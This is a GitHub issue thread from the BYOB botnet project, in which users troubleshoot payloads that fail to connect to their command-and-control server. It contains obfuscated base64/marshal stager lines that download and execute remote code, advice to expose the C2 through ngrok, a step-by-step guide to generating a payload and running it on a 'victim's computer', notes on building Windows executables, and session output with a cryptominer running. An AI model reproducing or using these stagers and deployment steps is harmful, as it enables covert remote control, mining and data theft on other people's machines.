### ISSUE TITLE
Connection refused.

### ISSUE THREAD

**Issue by xxlimit** [malwaredllc/byob#294]
Traceback (most recent call last):
  File "byob_z7N.py", line 5, in <module>
    exec(eval(marshal.loads(zlib.decompress(base64.b64decode(b'eJwrtWRgYCgtyskvSM3TUM8oKSmw0tc3MtEz1DO0NNOzsLAyNDa20NcvLklMTy0q1q8y99MrqFTX1CtKTUzR0AQAIDcRnA==')))))
  File "<string>", line 1, in <module>
  File "/usr/lib/python2.7/urllib.py", line 87, in urlopen
    return opener.open(url)
  File "/usr/lib/python2.7/urllib.py", line 215, in open
    return getattr(self, name)(url)
  File "/usr/lib/python2.7/urllib.py", line 352, in open_http
    h.endheaders(data)
  File "/usr/lib/python2.7/httplib.py", line 1078, in endheaders
    self._send_output(message_body)
  File "/usr/lib/python2.7/httplib.py", line 894, in _send_output
    self.send(msg)
  File "/usr/lib/python2.7/httplib.py", line 856, in send
    self.connect()
  File "/usr/lib/python2.7/httplib.py", line 833, in connect
    self.timeout, self.source_address)
  File "/usr/lib/python2.7/socket.py", line 575, in create_connection
    raise err
IOError: [Errno socket error] [Errno 111] Connection refused

**Comment by ricko2991** [comment]
which os you are using to make, and which os as your target?

**Comment by drnhzn** [comment]
@ricko2991 Same problem. for linux using python script as payload.

**Comment by ricko2991** [comment]
If you want to target windows, use windows to generate payloads too, same is the case with linux. There is some kind of code that is specific to windows only if you are targeting it for windows. If you make it on linux, it will be rejected because it is not on target.

**Comment by drnhzn** [comment]
@ricko2991 I used linux to generate the payload and my target is also linux. Still connection refused.

**Comment by ricko2991** [comment]
This is web-gui or byob ?

**Comment by drnhzn** [comment]
web-gui

**Comment by ricko2991** [comment]
This happens because the localhost you are using is 127.0.0.1 and it cannot be accessed by all computers unless accessed by your computer

**Comment by ricko2991** [comment]
Just decode this code, there are several tutorials on youtube how to decode marshal. I don't do it because I'm not used to it. And if it has been decoded, use the port forwading technique. Replace the ip there with the host from the port forwading service, for example ngrok. 

exec(eval(marshal.loads(zlib.decompress(base64.b64decode(b'eJwrtWFgYCgtyskvSM3TUM8oKSmw0tc3NDDWszDRMzQ00zMyMrMyNDa20NcvLklMTy0q1q9KttArqFTX1CtKTUzR0AQATRwSQA==')))))

**Comment by drnhzn** [comment]
@ricko2991 Will installing it on a server fix the problem?

**Comment by ricko2991** [comment]
I don't know, just try it. 
Maybe this video can help.
https://www.youtube.com/watch?v=8YswLITdE7g

**Comment by drnhzn** [comment]
@ricko2991 Installed it on a sever and my local computer connected after I ran the payload. However screenshot and shell is not working. cannot do LS in the shell.

**Comment by drnhzn** [comment]
![Screenshot from 2020-10-17 00-21-15](https://user-images.githubusercontent.com/19513536/96283380-b65bfb00-100e-11eb-9d33-27634e330bcb.png)

**Comment by ricko2991** [comment]
> @ricko2991 Installed it on a sever and my local computer connected after I ran the payload. However screenshot and shell is not working. cannot do LS in the shell.

Interact with the shell first. Because it is web-gui, it will look attractive. I use byob(CLI).Because i use byob the command to interact with the session is: 
shell [the id (ex: 1)]

**Comment by debian-user-france1** [comment]
Hello, so I have the same Problem with the connection refused error. I run the payload on my computer and this is opening the server too. Is the client connecting to 127.0.0.1 or the server is hostet here: 0.0.0.0.0:5000     I didn't modifyed the Payload and I'm using the web-gui

**Comment by debian-user-france1** [comment]
I try this on my Kali Linux...

**Comment by debian-user-france1** [comment]
Error message while installing on kali linux, please MAKE SURE THAT YOU RUNNED THE SH FILE
ERROR: opencv-python 4.4.0.44 has requirement numpy>=1.17.3, but you'll have numpy 1.15.2 which is incompatible.                                      
Installing collected packages: numpy
Successfully installed numpy-1.15.2
Building Docker images - this will take a while, please be patient...
ERRO[0000] failed to dial gRPC: cannot connect to the Docker daemon. Is 'docker daemon' running on this host?: dial unix /var/run/docker.sock: connect: permission denied 
Got permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Post "http://%2Fvar%2Frun%2Fdocker.sock/v1.40/build?buildargs=%7B%7D&cachefrom=%5B%5D&cgroupparent=&cpuperiod=0&cpuquota=0&cpusetcpus=&cpusetmems=&cpushares=0&dockerfile=Dockerfile-py3-amd64&labels=%7B%7D&memory=0&memswap=0&networkmode=default&rm=1&session=3fm1vegsa4n43ddf7pj96fgc9&shmsize=0&t=nix-amd64&target=&ulimits=null&version=1": dial unix /var/run/docker.sock: connect: permission denied
ERRO[0000] failed to dial gRPC: cannot connect to the Docker daemon. Is 'docker daemon' running on this host?: dial unix /var/run/docker.sock: connect: permission denied 
Got permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Post "http://%2Fvar%2Frun%2Fdocker.sock/v1.40/build?buildargs=%7B%7D&cachefrom=%5B%5D&cgroupparent=&cpuperiod=0&cpuquota=0&cpusetcpus=&cpusetmems=&cpushares=0&dockerfile=Dockerfile-py3-i386&labels=%7B%7D&memory=0&memswap=0&networkmode=default&rm=1&session=r5h8aacctv4x6cu730bys4ziw&shmsize=0&t=nix-i386&target=&ulimits=null&version=1": dial unix /var/run/docker.sock: connect: permission denied
Got permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Post "http://%2Fvar%2Frun%2Fdocker.sock/v1.40/build?buildargs=%7B%7D&cachefrom=%5B%5D&cgroupparent=&cpuperiod=0&cpuquota=0&cpusetcpus=&cpusetmems=&cpushares=0&dockerfile=Dockerfile-py3-win32&labels=%7B%7D&memory=0&memswap=0&networkmode=default&rm=1&session=f9jimojhfsjgx41gh7rbab9pc&shmsize=0&t=win-x32&target=&ulimits=null&version=1": dial unix /var/run/docker.sock: connect: permission denied
Running C2 server with locally hosted web app GUI...
Navigate to http://127.0.0.1:5000 and set up your user to get started.
Traceback (most recent call last):
  File "run.py", line 1, in <module>
    from buildyourownbotnet import app
  File "/home/france1/Dokumente/byob/web-gui/buildyourownbotnet/__init__.py", line 18, in <module>
    db = SQLAlchemy(app)
  File "/usr/lib/python3/dist-packages/flask_sqlalchemy/__init__.py", line 716, in __init__
    self.Model = self.make_declarative_base(model_class, metadata)
  File "/usr/lib/python3/dist-packages/flask_sqlalchemy/__init__.py", line 798, in make_declarative_base
    model.query_class = self.Query
  File "/usr/lib/python3/dist-packages/sqlalchemy/ext/declarative/api.py", line 79, in __setattr__
    _add_attribute(cls, key, value)
  File "/usr/lib/python3/dist-packages/sqlalchemy/ext/declarative/base.py", line 802, in _add_attribute
    type.__setattr__(cls, key, value)
TypeError: can't apply this __setattr__ to DefaultMeta object

**Comment by debian-user-france1** [comment]
There is another connection error
i check if docker is installed

**Comment by debian-user-france1** [comment]
sorry, my local timezone is wrong, i wrote ehese messages -2 hours

**Comment by debian-user-france1** [comment]
docker was not installed INSTALL DOCKER(was on ubuntu installed)

**Comment by debian-user-france1** [comment]
I have no premission to connect to my docker file, docker is still running, but the script can't connect to the docker daemon
what can I do?

**Comment by debian-user-france1** [comment]
bash: cannot set terminal process group (-1): Inappropriate ioctl for device                                                                          
bash: no job control in this shell                                         
+ apt-get update                                                           
another error message, I still cant create executable files - it's the same error message like this by running startup.sh

on ubuntu I didn't start startup.sh, I started run.py, THIS CAN BE THE ERROR, IF IT IS, I SAY SORRY...   PLEASE TRY TO RECREATE MY MISTAKE AND SAY, IF IT IS WORKING...

**Comment by debian-user-france1** [comment]
Failed to build py-cryptonight pyrx

Installing collected packages: py-cryptonight, pyrx, mss, WMI, numpy, six, python-xlib, pyxhook, PyJWT, idna, urllib3, certifi, requests, twilio, colorama, altgraph, dis3, PyInstaller, pycryptodomex, opencv-python

    Running setup.py install for py-cryptonight: started

    Running setup.py install for py-cryptonight: finished with status 'error'

france1@kali:~/Dokumente/byob/byob$ 
THIS IS NO WEB-GUI, I TRIED TO USE THIS, WHAT IS THIS FOR AN ERROR MESSAGE? SORRY IF U GET TO MANY EMAIL; I WILL STOP NOW...

**Comment by ricko2991** [comment]
> I have no premission to connect to my docker file, docker is still running, but the script can't connect to the docker daemon
> what can I do?

if you use ubuntu then run it as root first. Likewise when activating docker:  **systemctl docker restart** also run as root.

**Comment by ricko2991** [comment]
> Failed to build py-cryptonight pyrx
> 
> Installing collected packages: py-cryptonight, pyrx, mss, WMI, numpy, six, python-xlib, pyxhook, PyJWT, idna, urllib3, certifi, requests, twilio, colorama, altgraph, dis3, PyInstaller, pycryptodomex, opencv-python
> 
> ```
> Running setup.py install for py-cryptonight: started
> 
> Running setup.py install for py-cryptonight: finished with status 'error'
> ```
> 
> france1@kali:~/Dokumente/byob/byob$
> THIS IS NO WEB-GUI, I TRIED TO USE THIS, WHAT IS THIS FOR AN ERROR MESSAGE? SORRY IF U GET TO MANY EMAIL; I WILL STOP NOW...

Install package one by one in terminal. You can see the requirements package on **requirements.txt**

**Comment by debian-user-france1** [comment]
I wrote:
sudo service docker status -    running
I ran this first as non root,
then as root, same error

**Comment by debian-user-france1** [comment]
I saw a Message in the Log when I started the python Payload:   
INFO:werkzeug:127.0.0.1 - - [17/Oct/2020 12:18:07] "GET /output/france1/src/byob_wKD.py HTTP/1.1" 200 -   #I ran this on the Server, the Server is my Test Victim.   The Script printed the same error messsages.     I'm fimling now, schould i Post it? --   I im done

**Comment by debian-user-france1** [comment]
first I think we have to fix this:
0050:err:explorer:initialize_display_settings Failed to query current display settings for L"\\\\.\\DISPLAY1".
009c:err:ntoskrnl:ZwLoadDriver failed to create driver L"\\Registry\\Machine\\System\\CurrentControlSet\\Services\\wineusb": c0000142
WARNING: Retrying (Retry(total=4, connect=None, read=None, redirect=None, status=None)) after connection broken by 'NewConnectionError('<pip._vendor.urllib3.connection.HTTPSConnection object at 0x028BC310>: Failed to establish a new connection: [Errno 11002] getaddrinfo failed')': /simple/pyinstaller/
WARNING: Retrying (Retry(total=3, connect=None, read=None, redirect=None, status=None)) after connection broken by 'NewConnectionError('<pip._vendor.urllib3.connection.HTTPSConnection object at 0x028BC250>: Failed to establish a new connection: [Errno 11002] getaddrinfo failed')': /simple/pyinstaller/
WARNING: Retrying (Retry(total=2, connect=None, read=None, redirect=None, status=None)) after connection broken by 'NewConnectionError('<pip._vendor.urllib3.connection.HTTPSConnection object at 0x028BC350>: Failed to establish a new connection: [Errno 11002] getaddrinfo failed')': /simple/pyinstaller/
WARNING: Retrying (Retry(total=1, connect=None, read=None, redirect=None, status=None)) after connection broken by 'NewConnectionError('<pip._vendor.urllib3.connection.HTTPSConnection object at 0x028BC230>: Failed to establish a new connection: [Errno 11002] getaddrinfo failed')': /simple/pyinstaller/
WARNING: Retrying (Retry(total=0, connect=None, read=None, redirect=None, status=None)) after connection broken by 'NewConnectionError('<pip._vendor.urllib3.connection.HTTPSConnection object at 0x028BC630>: Failed to establish a new connection: [Errno 11002] getaddrinfo failed')': /simple/pyinstaller/
ERROR: Could not find a version that satisfies the requirement pyinstaller==3.6 (from versions: none)
ERROR: No matching distribution found for pyinstaller==3.6

This is the log of startup.sh

**Comment by debian-user-france1** [comment]
This Message is if i generate a Windows executable:  I CANT CREATE LINUX EXECUTABLES TOO

**
/usr/bin/docker
(343 bytes written to output/france1/src/byob_win_x32_k7W.py)
	Compiling executable...

b"Unable to find image 'win-x32:latest' locally"
b''
b''
b''
b''
b''
b''
b''
b"docker: Error response from daemon: pull access denied for win-x32, repository does not exist or may require 'docker login': denied: requested access to the resource is denied."
b''
b"See 'docker run --help'."
b''
**      I THINK DOCKER DOESN'T WORK AS WELL, THIS IS DOING THE CONNECTION REFUSED ERROR - AND THE WINDOWS EXECUTABLE ERROR.

**Comment by debian-user-france1** [comment]
PER ERROR byob is writing this PER SECOND
b''
With two errors, two b'' per second...

**Comment by debian-user-france1** [comment]
Have you the same errors @xxlimit ?????

**Comment by debian-user-france1** [comment]
> > Failed to build py-cryptonight pyrx
> > Installing collected packages: py-cryptonight, pyrx, mss, WMI, numpy, six, python-xlib, pyxhook, PyJWT, idna, urllib3, certifi, requests, twilio, colorama, altgraph, dis3, PyInstaller, pycryptodomex, opencv-python
> > ```
> > Running setup.py install for py-cryptonight: started
> > 
> > Running setup.py install for py-cryptonight: finished with status 'error'
> > ```
> > 
> > 
> > france1@kali:~/Dokumente/byob/byob$
> > THIS IS NO WEB-GUI, I TRIED TO USE THIS, WHAT IS THIS FOR AN ERROR MESSAGE? SORRY IF U GET TO MANY EMAIL; I WILL STOP NOW...
> 
> Install package one by one in terminal. You can see the requirements package on **requirements.txt**
> 
> **Final note**:
> **Only on Windows**
> If you want to install all packages as well, install visual studio community. And just download all the requirements features from **Desktop Development with C++**. https://youtu.be/C9MaBbmcJPE This will allow the cmake to run
> 
> https://visualstudio.microsoft.com/

I cant install python-pip, package not found and pip3 is not working with this:   pip3 install -r file, **I installed already one by one**

**Comment by debian-user-france1** [comment]
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        inet6 fe80::42:eff:fede:d6eb  prefixlen 64  scopeid 0x20<link>
        ether 02:42:0e:de:d6:eb  txqueuelen 0  (Ethernet)
        RX packets 30  bytes 1638 (1.6 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 62  bytes 8234 (8.2 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

**Comment by debian-user-france1** [comment]
what is wrong here?

**root@ubuntu-desktop:/home/france1/Dokumente/byob/web-gui# python3 run.py --host 172.17.0.1
ModuleNotFoundError: No module named 'numpy.core._multiarray_umath'
usage: server.py [-h] [--host HOST] [--port PORT] [--debug] [-v]
server.py: error: argument --host: expected one argument**

**Comment by debian-user-france1** [comment]
Thanks for the help, ricko2991, now I downloaded an unmarshaller, not done, but I understand it now.
I have to write first the right IP in the script right?  So i'm installing the unmarshaller now...
I'll take a look now...

**Comment by ricko2991** [comment]
@debian-user-france1 If you fail to run web-gui there is still an easier option to use, namely byob, this is the same as web-gui, but the advantage of web-gui is that we can create multiple payloads that can be compatible with all operating systems. I rarely use web-gui and I run byob without any problems in the installation and connection of the payload.

**Comment by debian-user-france1** [comment]
What do you mean?

**Comment by ricko2991** [comment]
Byob (CLI)

**Comment by debian-user-france1** [comment]
Is the command line interface with browser too?
So, I never tried this folder byob/byob/server.py   So... Schould i do the server here?
Do you mean this?

**Comment by ricko2991** [comment]
Yes. Not for browser. You can run it from terminal or cmd.

**Comment by debian-user-france1** [comment]
ok...  I try this, but I think this is not working too becaus I think docker dont allow me to connect to the server.

**Comment by ricko2991** [comment]
This worked for me. In fact, I've been using it for a few months and it's still doing well.

**Comment by debian-user-france1** [comment]
please help me to **unmarshall**:

**https://github.com/xtuc/unmarshaller**

import {builder, unmarshal} from 'unmarshaller';   #example script from xtuc

const unmarshaller = {
  editor: builder.string('EDITOR'),
  browser: builder.string('BROWSER'),
};

const lookupFn = (key) => process.env[key];
const config = unmarshal(lookupFn, unmarshaller);

console.log(config);

**Comment by debian-user-france1** [comment]
Ubuntu says my Terminal is crashed, but both are opened

**Comment by debian-user-france1** [comment]
The same connection refused error
I be able to run the web-gui:  run.py without any error messages (start it), so i think, I use the web-gui, but i must unmarshall this file and write the correct ip. maybe is the ip wrong. Please show me how I unmarshall this payloads. For example this:


**import sys,zlib,base64,marshal,json,urllib
if sys.version_info[0] > 2:
    from urllib import request
urlopen = urllib.request.urlopen if sys.version_info[0] > 2 else urllib.urlopen
exec(eval(marshal.loads(zlib.decompress(base64.b64decode(b'eJwrtWZgYCgtyskvSM3TUM8oKSmw0tc3tDTSMzSz0DPQM7S0tDI1MDDU1y8uSUxPLSrWTylL0iuoVNfUK0pNTNHQBABA5RI5'))))**

**Comment by debian-user-france1** [comment]
OMG!!!  It's working...   But only the /byob/byob
BUT ITS STILL WORKING
Please help me to select a special port and special ip( --host xxx.xxx.xx.xxx is not working ), only on /byob/byob without web interface.  What have i to do??

**Comment by debian-user-france1** [comment]
I like the Web interface, it's pretty...

**Comment by debian-user-france1** [comment]
id                          None
   uid                         9b58f06c0b62c0c121543c1bd208b6d2
   online                      True
   joined                      2020-10-17 20:45:50.863405
   last_online                 2020-10-17 20:45:50.863490
   sessions                    True
   public_ip                   31.10.152.211
   mac_address                 75:55:74:91:E9:3A
   local_ip                    127.0.1.1
   username                    france1
   administrator               False
   platform                    linux
   device                      ubuntu-Desktop
   architecture                64
   longitude                   8.55
   latitude                    47.3667
   owner                       None

**Comment by debian-user-france1** [comment]
<string>:6: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
Exception in thread Thread-7:
Traceback (most recent call last):
  File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.8/threading.py", line 870, in run
    self._target(*self._args, **self._kwargs)
  File "<string>", line 2569, in worker
AttributeError: module 'pyrx' has no attribute 'get_rx_hash'


**But it's working...**

**Comment by debian-user-france1** [comment]
france1@ubuntu-desktop:~/Dokumente/byob/web-gui$ python3 run.py --host 192.168.0.199 
usage: server.py [-h] [--host HOST] [--port PORT] [--debug] [-v]
server.py: error: argument --host: expected one argument
france1@ubuntu-desktop:~/Dokumente/byob/web-gui$ python3 run.py --host 192.168.0.199 80
usage: server.py [-h] [--host HOST] [--port PORT] [--debug] [-v]
server.py: error: argument --host: expected one argument
  **What is wrong??**

**Comment by debian-user-france1** [comment]
france1@ubuntu-desktop:~/Dokumente/byob/web-gui$ python3 run.py --host 192.168.0.199 
usage: server.py [-h] [--host HOST] [--port PORT] [--debug] [-v]
server.py: error: argument --host: expected one argument

france1@ubuntu-desktop:~/Dokumente/byob/web-gui$ python3 run.py --host 192.168.0.199 80
usage: server.py [-h] [--host HOST] [--port PORT] [--debug] [-v]
server.py: error: argument --host: expected one argument
**What is wrong?**

**Comment by debian-user-france1** [comment]
@xxlimit Please use the folder byob/byob. Then it is working. Guide:
start a server with this command:   **python server.py (yourIP) (yourPort);**
   open another terminal and write in byob/byob: p**ython client.py (ip-server) (port-server);**
                                         now you can see in the byob/byob folder a file for example **byob_wHKD.py**
                                           go to you Vitcims Computer and load the python fiel to the computer and execute it with python.
                                         write on server.py Terminal:     clients
                                             There would be an client....
                                           (write help)

**If this wont work do this:  (work as root, in ubuntu: sudo -s or sudo su root)
           install python3, python3-pip (named in ubuntu)
           install requirements one by one:   pip3 install (package)
           then try again, but execute the server and the client with python3**

**Comment by debian-user-france1** [comment]
**now please help me to fix web-gui**

**Comment by debian-user-france1** [comment]
[ 0 @ /home/france1/Dokumente/byob/byob ]>passive
Session init exception: 'utf-8' codec can't decode byte 0x9c in position 0: invalid start byte


[-] Failed Connection: 127.0.0.1

None 

now not working

**Comment by debian-user-france1** [comment]
Session 0 disconnected
[root @ /home/france1/Dokumente/byob/byob]>
[root @ /home/france1/Dokumente/byob/byob]>
[root @ /home/france1/Dokumente/byob/byob]>
[root @ /home/france1/Dokumente/byob/byob]>

**Comment by debian-user-france1** [comment]
shell 0
Session 0 does not exist

**Comment by debian-user-france1** [comment]
online = False

Victims Script (running temporarly on server):
new error message:


Process Miner-1:
Traceback (most recent call last):
  File "/usr/lib/python3.8/multiprocessing/process.py", line 315, in _bootstrap
    self.run()
  File "<string>", line 2507, in run
  File "/usr/lib/python3.8/json/__init__.py", line 357, in loads
    return _default_decoder.decode(s)
  File "/usr/lib/python3.8/json/decoder.py", line 337, in decode
    obj, end = self.raw_decode(s, idx=_w(s, 0).end())
  File "/usr/lib/python3.8/json/decoder.py", line 355, in raw_decode
    raise JSONDecodeError("Expecting value", s, err.value) from None
json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)

**Comment by debian-user-france1** [comment]
passive might be not working, but I try this on my windows tablet now...   My stupid Windows Tablet

**Comment by debian-user-france1** [comment]
not working:  Can't connect because refused (I tried to translate t english from German)

**Comment by debian-user-france1** [comment]
how to create windows exe files?    Python haven't colorama

**Comment by ricko2991** [comment]
I don't have much time to help you and also try to read the wiki before doing so. You can join the discord server from byob https://discord.com/invite/8FsSrw7  Maybe you can get help from there to solving your problem 👍

**Comment by ricko2991** [comment]
Are you still have any error on byob or web gui?Build Exe on python don't need coloroma. It need package name pyinstaller, if you install it then you can create an exe file. Use this command :
python3 <host> <port> --name <the-name> --freeze

Note :
`Freeze command can build the exe file, it can automatic call pyinstaller.`

**Comment by debian-user-france1** [comment]
Yes, but I only can create windows file in byob/byob, not in the web-gui

My victim fail to connect to my server, the server refuse it and I don't know why, because if I run the payload on the server it still works with some errors, but it still works
Maybe the router refuse the connection, but i'm in the same network, my home network
I didn't change anything on the router

**Comment by debian-user-france1** [comment]
Can u tell me please if it is fixed?
